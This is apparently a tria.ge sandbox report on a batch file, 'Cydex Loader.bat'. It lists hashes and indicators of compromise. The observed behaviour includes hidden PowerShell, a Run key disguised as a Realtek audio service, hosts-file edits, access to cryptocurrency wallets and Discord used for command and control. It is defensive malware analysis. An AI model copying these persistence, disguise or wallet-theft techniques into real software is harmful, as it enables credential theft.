Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
Cydex Loader.bat
Resource
win10v2004-20240709-en
General
-
Target
Cydex Loader.bat
-
Size
13.0MB
-
MD5
fd5e34bb3be950c5d99328d838c90fec
-
SHA1
4ae0bf222014e8ddd1b897f2196b535c5d5aabcb
-
SHA256
d8f5a306f726f64899ff24c1fbd7be438093ef89bed6ef8cec9fa0494f1b90d7
-
SHA512
da68361bf220bc719920c9162e7295fff5fcbd3daa5e16bf36fb50ebc8cfa81747e016455f2ab4941f2527d06cc169991ef9f3ba036a7a62a3a27c8534730e28
-
SSDEEP
49152:YuUvQg4JoDocb7J+qkGyye2opfp+xtvwP6Tb2QSBn+3nSJRa7d5oj2vO2Y4yUiiF:Y1
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 21 2532 powershell.exe 22 2532 powershell.exe 24 2532 powershell.exe 26 2532 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2532 powershell.exe 3148 powershell.exe 2828 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 19 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe attrib.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2148 wmic.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 26 Go-http-client/1.1 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133652233350630982" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133652233982518146" svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652233633962715" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133652233644596711" svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652233638025434" svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133650097564967226" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133650097567154891" svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652234275345566" svchost.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133652234303246894" svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2828 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2828 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 4160 powershell.exe 4160 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 3148 powershell.exe 3148 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2532 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3464 Explorer.EXE 3464 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3464 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3232 wrote to memory of 3948 3232 cmd.exe 87 PID 3232 wrote to memory of 3948 3232 cmd.exe 87 PID 3232 wrote to memory of 2532 3232 cmd.exe 88 PID 3232 wrote to memory of 2532 3232 cmd.exe 88 PID 2532 wrote to memory of 3464 2532 powershell.exe 56 PID 2532 wrote to memory of 1864 2532 powershell.exe 34 PID 2532 wrote to memory of 440 2532 powershell.exe 16 PID 2532 wrote to memory of 1368 2532 powershell.exe 25 PID 2532 wrote to memory of 1564 2532 powershell.exe 28 PID 2532 wrote to memory of 1756 2532 powershell.exe 31 PID 2532 wrote to memory of 1556 2532 powershell.exe 27 PID 2532 wrote to memory of 964 2532 powershell.exe 12 PID 2532 wrote to memory of 1356 2532 powershell.exe 24 PID 2532 wrote to memory of 764 2532 powershell.exe 74 PID 2532 wrote to memory of 1340 2532 powershell.exe 23 PID 2532 wrote to memory of 1928 2532 powershell.exe 35 PID 2532 wrote to memory of 2712 2532 powershell.exe 48 PID 2532 wrote to memory of 1332 2532 powershell.exe 22 PID 2532 wrote to memory of 2704 2532 powershell.exe 47 PID 2532 wrote to memory of 2296 2532 powershell.exe 66 PID 2532 wrote to memory of 1304 2532 powershell.exe 69 PID 2532 wrote to memory of 908 2532 powershell.exe 11 PID 2532 wrote to memory of 512 2532 powershell.exe 14 PID 2532 wrote to memory of 1692 2532 powershell.exe 30 PID 2532 wrote to memory of 2080 2532 powershell.exe 39 PID 2532 wrote to memory of 3652 2532 powershell.exe 72 PID 2532 wrote to memory of 2064 2532 powershell.exe 38 PID 2532 wrote to memory of 2260 2532 powershell.exe 41 PID 2532 wrote to memory of 1076 2532 powershell.exe 18 PID 2532 wrote to memory of 1856 2532 powershell.exe 33 PID 2532 wrote to memory of 3036 2532 powershell.exe 51 PID 2532 wrote to memory of 2640 2532 powershell.exe 45 PID 2532 wrote to memory of 1440 2532 powershell.exe 68 PID 2532 wrote to memory of 1636 2532 powershell.exe 29 PID 2532 wrote to memory of 2432 2532 powershell.exe 43 PID 2532 wrote to memory of 1096 2532 powershell.exe 19 PID 2532 wrote to memory of 2424 2532 powershell.exe 42 PID 2532 wrote to memory of 2620 2532 powershell.exe 44 PID 2532 wrote to memory of 3600 2532 powershell.exe 57 PID 2532 wrote to memory of 1036 2532 powershell.exe 17 PID 2532 wrote to memory of 3396 2532 powershell.exe 55 PID 2532 wrote to memory of 788 2532 powershell.exe 8 PID 2532 wrote to memory of 3188 2532 powershell.exe 54 PID 2532 wrote to memory of 620 2532 powershell.exe 15 PID 2532 wrote to memory of 1996 2532 powershell.exe 36 PID 2532 wrote to memory of 1204 2532 powershell.exe 21 PID 2532 wrote to memory of 2188 2532 powershell.exe 40 PID 2532 wrote to memory of 4548 2532 powershell.exe 65 PID 2532 wrote to memory of 1788 2532 powershell.exe 32 PID 2532 wrote to memory of 1392 2532 powershell.exe 26 PID 2532 wrote to memory of 1184 2532 powershell.exe 20 PID 788 wrote to memory of 5064 788 svchost.exe 90 PID 788 wrote to memory of 5064 788 svchost.exe 90 PID 2532 wrote to memory of 2184 2532 powershell.exe 91 PID 2532 wrote to memory of 2184 2532 powershell.exe 91 PID 2532 wrote to memory of 2828 2532 powershell.exe 92 PID 2532 wrote to memory of 2828 2532 powershell.exe 92 PID 2532 wrote to memory of 2996 2532 powershell.exe 93 PID 2532 wrote to memory of 2996 2532 powershell.exe 93 PID 2532 wrote to memory of 924 2532 powershell.exe 94 PID 2532 wrote to memory of 924 2532 powershell.exe 94 PID 2532 wrote to memory of 1748 2532 powershell.exe 95 PID 2532 wrote to memory of 1748 2532 powershell.exe 95 PID 2532 wrote to memory of 4160 2532 powershell.exe 96 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4896 attrib.exe 4964 attrib.exe 2184 attrib.exe 2996 attrib.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:5064
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:3252
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:1444
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:844
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:4964
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:4948
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3396
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
